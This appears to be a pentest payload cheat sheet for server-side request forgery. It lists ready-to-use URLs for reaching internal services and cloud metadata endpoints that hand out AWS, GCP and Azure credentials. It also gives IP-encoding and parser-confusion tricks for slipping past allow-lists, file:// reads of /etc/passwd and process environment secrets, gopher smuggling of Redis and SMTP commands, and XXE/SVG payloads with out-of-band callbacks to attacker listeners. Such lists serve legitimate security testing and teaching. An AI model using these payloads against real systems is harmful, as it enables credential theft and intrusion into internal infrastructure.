web-pentest

SSRF — Server-Side Request Forgery

Server-side request forgery payloads — internal targets, cloud metadata (AWS/GCP/Azure), IP-encoding and parser-confusion bypasses, protocol smuggling (gopher/file/dict) and blind/parser-driven SSRF.

1 views Jun 2026 lazyhackers

Basic Internal Targets (6)

http://127.0.0.1/

Loopback — reach services bound to localhost

internal loopback

http://localhost:6379/

Redis on localhost (frequently unauthenticated)

internal redis

http://127.0.0.1:9200/_cat/indices

Elasticsearch index listing

internal elastic

http://[::1]/

IPv6 loopback

internal ipv6

http://0.0.0.0:8080/

0.0.0.0 reaches local services on some stacks

internal

http://[email protected]/

userinfo trick — looks external, resolves internal

internal bypass

Cloud Metadata (5)

http://169.254.169.254/latest/meta-data/iam/security-credentials/

AWS IMDSv1 — list IAM roles

cloud aws imds

http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE

AWS — fetch the role's temporary credentials

cloud aws

http://169.254.169.254/latest/api/token

AWS IMDSv2 — PUT here first to get a session token

cloud aws imdsv2

http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

GCP token (needs header Metadata-Flavor: Google)

cloud gcp

http://169.254.169.254/metadata/instance?api-version=2021-02-01

Azure IMDS (needs header Metadata: true)

cloud azure

IP Encoding Bypass (6)

http://2130706433/

127.0.0.1 as a decimal integer

bypass encoding

http://0x7f000001/

127.0.0.1 in hexadecimal

bypass encoding

http://0177.0.0.1/

127.0.0.1 in octal

bypass encoding

http://127.1/

Short-form loopback

bypass

http://[::ffff:127.0.0.1]/

IPv4-mapped IPv6 address

bypass ipv6

http://127.0.0.1.nip.io/

Public DNS name that resolves to 127.0.0.1

bypass dns

Parser Confusion & Redirect (5)

http://[email protected]/

Everything before @ is userinfo; real host is 127.0.0.1

bypass parser

http://127.0.0.1#@expected.com/

Fragment confuses naive host parsers

bypass parser

http://expected.com\@169.254.169.254/

Backslash parser inconsistency

bypass parser

http://10.10.14.1/redir (302 -> http://169.254.169.254/)

Open redirect to bypass allow-lists

bypass redirect

http://allowed.target.com.attacker.com/

Suffix trick against weak allow-list checks

bypass allowlist

Protocol Smuggling (5)

file:///etc/passwd

Read local files when file:// is permitted

protocol file

file:///proc/self/environ

Leak process environment (secrets) on Linux

protocol file

dict://127.0.0.1:11211/stats

Talk to Memcached via dict://

protocol dict

gopher://127.0.0.1:6379/_SET%20k%20v%0D%0A

Smuggle a Redis command via gopher (RCE primitives)

protocol gopher redis

gopher://127.0.0.1:25/_HELO%20x%0D%0A

Smuggle SMTP via gopher

protocol gopher smtp

Blind SSRF & Parser-Driven (4)

http://YOUR-ID.oast.fun/

OOB interaction (interactsh / Burp Collaborator) for blind SSRF

blind oob

http://10.10.14.1/ssrf

Hit your own listener to confirm an outbound request

blind callback

<svg xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="http://169.254.169.254/latest/meta-data/"/></svg>

SVG→PDF/PNG renderer SSRF

parser svg

<!DOCTYPE x [<!ENTITY e SYSTEM "http://169.254.169.254/">]><x>&e;</x>

XXE-driven SSRF via an external entity

parser xxe

SSRF — Server-Side Request Forgery

Related Articles

JSON and YAML Unsafe Deserialization

Supply Chain Attacks

Cross-Site Scripting Mastery

File Upload to RCE

Advanced SSRF

Related Courses

Web Application Penetration Testing

Bug Bounty Hunting — From Recon to Bounty